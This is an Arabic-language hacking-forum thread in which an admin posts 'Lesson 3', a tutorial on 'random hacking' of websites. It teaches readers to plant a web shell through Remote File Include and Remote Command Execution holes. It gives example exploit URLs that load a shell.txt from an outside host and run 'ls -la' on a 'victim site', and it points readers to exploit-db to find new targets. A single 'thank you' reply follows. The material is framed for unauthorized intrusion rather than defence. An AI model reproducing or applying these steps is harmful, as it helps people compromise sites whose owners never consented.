_ * _ فرسان الهكرز _*_
اهلا و مرحبا بك فى _ * _ فرسان الهاكرز _*_
لتعلم هاكرز رائع و تكون خبير فيه بدرجة ممتازة
تحيات الادارة : Admin ، النسر الجارح
_ * _ فرسان الهكرز _*_
اهلا و مرحبا بك فى _ * _ فرسان الهاكرز _*_
لتعلم هاكرز رائع و تكون خبير فيه بدرجة ممتازة
تحيات الادارة : Admin ، النسر الجارح
_ * _ فرسان الهكرز _*_
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

_ * _ فرسان الهكرز _*_

/*/ اكبر موقع هاكرز فى مصر /*/
 
الرئيسيةأحدث الصورالتسجيلدخول
مرحبا بكم فى فرسان الهاكرز نتمنى لكم قضاء امتع الاوقات و تعلم هاكرز ممتع

 

 الدرس الثالث: البحث عن الثغرات ورفع الشيل

اذهب الى الأسفل 
2 مشترك
كاتب الموضوعرسالة
النسر الجارح
Admin
Admin



ذكر عدد المساهمات : 71
السٌّمعَة : 0
تاريخ الميلاد : 24/01/1998
تاريخ التسجيل : 30/06/2011
العمر : 26

الدرس الثالث: البحث عن الثغرات ورفع الشيل  Empty
مُساهمةموضوع: الدرس الثالث: البحث عن الثغرات ورفع الشيل    الدرس الثالث: البحث عن الثغرات ورفع الشيل  Icon_minitimeالسبت يوليو 02, 2011 8:40 am


<blockquote class="postcontent restore ">
بسم الله الرحمن الرحيم


السلام عليكم ورحمة الله وبركاته


تحدثنا في الدروس السابقة عن مفاهيم
أختراق المواقع وعن أوامر الينكس


وسيكون درسنا الثالث:

البحث عن الثغرات الجديده ورفع الشل
(الأختراق العشوائي)


بداية درسنا هذا ندخل في الجد لتطبيق
ماتعلمناه في الدرسين السابقه وبالأخص تطبيق الأوامر

لتطبيق الأوامر الي تعلمتها تحتاج شل .. والشل لابد تزرعة
على موقع عن طريق ثغرات الريموت وهي

Remote File Include
commands execution
وهذي النوعية من الثغرات خــطــيرة جداً
والسبب انها تنفذ اوامر على السيرفر وممكن تسيطر على الموقع
بشكل كامل

طبعاً يوجد ثغرات اخرى للمواقع لاكن ليست بمستوى هالنوعيه
وباقي الثغرات اقل خطوره


نوضح طريقه عمل نوعية الثغرتين مع
تطبيق عملي تجربة بنفسك


((Remote File Include))
طريقه عمل هذي الثغرات هي ربط الشل مع الموقع وهي اكثر
الثغرات انتشار الأن

مثال على شكل استثمار الثغرة
http://www.google.com/index.php?asde....com/shell.txt?
-| نفصل الرابط |-
موقع الضحية: Google
الملف المصاب بالثغرة: index.php?asdely=
ملف الشل: www.aljyyosh.com/shell.txt؟
وبعد التنفيذ اذا الثغرة موجوده والموقع مصاب بها راح تشوف
عرض لك الشل .. وهنا يجي وقت تنفيذ الأوامر

ومثل ماتشوف ان رابط الشل جا بعد علامة " = "
ايضاً لابد ان يكون الشل بأمتداد .txt يعني ملف نصي وبعد
رابط الشل تضع علامة استفهام " ? "


اما النوعية الثانية
((Remote commands execution))
طريقة عمل هذه النوعية من الثغرات هي تنفيذ الأوامر على طول
بدون ماتحط رابط الشل

مثال على شكل استثمار الثغرة
www.google.com/index.php?cmd=ls -la
-| نفصل الرابط |-
موقع الضحية: Google
الملف المصاب بالثغرة: index.php?cmd=
احد اوامر الينكس: ls -la
وبعد التنفيذ اذا الثغرة موجودة فعلاً راح تشوفه يعرض لك في
المتصفح نتيجه الأمر المنفذ

ولو نفذت مثلاً امر ls -la راح يعرض لك الملفات والمجلدات
والتصاريح في المتصفح وبشكل غير مرتب يصعب التفرقه بين الملفات والمجلدات

ولعرضها بشكل مرتب مثلاً في متصفح الأكسبلور .. من الأعلى
تضغط على "عرض" ثم تختار من القائمة "المصدر" وراح يعرض لك نتيجه الأمر في
ملف نصي وبيكون بشكل مرتب

[ثغرة للتطبيق]
تم إزالة التطبيق بسبب أحد الأطفال
طبعاً مكان id مثل ماقلنا نكتب الأوامر
يوجد شرح سريع بالفديو في المرفقات بأسم (r-c-e)



بعد ماعرفنا طريقه عمل ثغرات الريموت
ننتقل الى كيفية ايجاد الثغرات الجديدة بأستخدام موقع
explot-db

رابط الشرح من الأخ الغالي بلاك جاغوار

http://www.aljyyosh.com/vb/showthread.php?t=16954


تحياتي للجميع
وللدورة تكملة

</blockquote>


الرجوع الى أعلى الصفحة اذهب الى الأسفل
khalid-net
هاكرز رائع
هاكرز رائع
khalid-net


ذكر عدد المساهمات : 56
السٌّمعَة : 0
تاريخ الميلاد : 12/08/1993
تاريخ التسجيل : 01/02/2012
العمر : 30
الموقع : makkah

الدرس الثالث: البحث عن الثغرات ورفع الشيل  Empty
مُساهمةموضوع: رد: الدرس الثالث: البحث عن الثغرات ورفع الشيل    الدرس الثالث: البحث عن الثغرات ورفع الشيل  Icon_minitimeالأربعاء فبراير 01, 2012 4:13 am

thank you
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
الدرس الثالث: البحث عن الثغرات ورفع الشيل
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
»  الدرس الرابع: التصاريح
» الدرس الخامس: الصلاحيات
» الدرس الثاني: أوامر اللينكس
» الدرس السابع: قواعد البيانات والإتصال بها

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
_ * _ فرسان الهكرز _*_ :: عالم الهاكرز :: اختراق المواقع و المنتديات-
انتقل الى: